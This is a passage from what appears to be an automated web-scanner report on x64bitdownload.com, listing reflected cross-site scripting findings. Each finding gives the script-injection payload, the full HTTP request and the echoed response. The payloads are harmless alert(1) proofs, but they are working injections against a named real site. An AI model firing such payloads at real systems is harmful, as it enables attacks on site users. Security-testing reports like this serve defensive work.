Host:	http://www.x64bitdownload.com
Path:	/64-bit-killfile-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2a32"><script>alert(1)</script>3d9f059b861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:50 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22killfile%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-killfile-downloads.html?a2a32"><script>alert(1)</script>3d9f059b861=1" />
...[SNIP]...

1.62. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a24e"><script>alert(1)</script>93d52a361a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:21 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html6a24e"><script>alert(1)</script>93d52a361a4" />
...[SNIP]...

1.63. http://www.x64bitdownload.com/64-bit-mp3-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-mp3-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1733"><script>alert(1)</script>a1ee4a1cc7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:49 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22mp3%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95011

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-mp3-downloads.html?d1733"><script>alert(1)</script>a1ee4a1cc7d=1" />
...[SNIP]...

1.64. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6969"><script>alert(1)</script>002478f819e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:45:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:55:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.htmld6969"><script>alert(1)</script>002478f819e" />
...[SNIP]...

1.65. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multimedia-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b14b"><script>alert(1)</script>9323ad41c03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:42:07 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:52:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multimedia-downloads.html?4b14b"><script>alert(1)</script>9323ad41c03=1" />
...[SNIP]...

1.66. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fada"><script>alert(1)</script>70bed0cb402 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:43:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:53:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html4fada"><script>alert(1)</script>70bed0cb402" />
...[SNIP]...

1.67. http://www.x64bitdownload.com/64-bit-multipart-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-multipart-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8218"><script>alert(1)</script>80184a44002 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:08 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73560

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-multipart-downloads.html?c8218"><script>alert(1)</script>80184a44002=1" />
...[SNIP]...

1.68. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ec5"><script>alert(1)</script>f58c4ad49c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42660

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.htmlb0ec5"><script>alert(1)</script>f58c4ad49c2" />
...[SNIP]...

1.69. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6397"><script>alert(1)</script>35e6393fe11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:00 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42663

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-c-44-newsgroup-clients-downloads.html?d6397"><script>alert(1)</script>35e6393fe11=1" />
...[SNIP]...

1.70. http://www.x64bitdownload.com/64-bit-news-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 621e6"><script>alert(1)</script>f97e27d071e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:01 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html621e6"><script>alert(1)</script>f97e27d071e" />
...[SNIP]...

1.71. http://www.x64bitdownload.com/64-bit-news-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84391"><script>alert(1)</script>fc16f13d74f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:37:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:15 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-downloads.html?84391"><script>alert(1)</script>fc16f13d74f=1" />
...[SNIP]...

1.72. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aea20"><script>alert(1)</script>0c390275c86 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:55:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:06:04 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.htmlaea20"><script>alert(1)</script>0c390275c86" />
...[SNIP]...

1.73. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-news-reader-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db679"><script>alert(1)</script>d820eccf371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-news-reader-downloads.html?db679"><script>alert(1)</script>d820eccf371=1" />
...[SNIP]...

1.74. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4bcf"><script>alert(1)</script>e2a44662479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:08 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:10 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.htmle4bcf"><script>alert(1)</script>e2a44662479" />
...[SNIP]...

1.75. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsfeed-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2049a"><script>alert(1)</script>3be85d0325f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:49:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-newsfeed-downloads.html?2049a"><script>alert(1)</script>3be85d0325f=1" />
...[SNIP]...

1.76. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc0f0"><script>alert(1)</script>db92b86c3df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

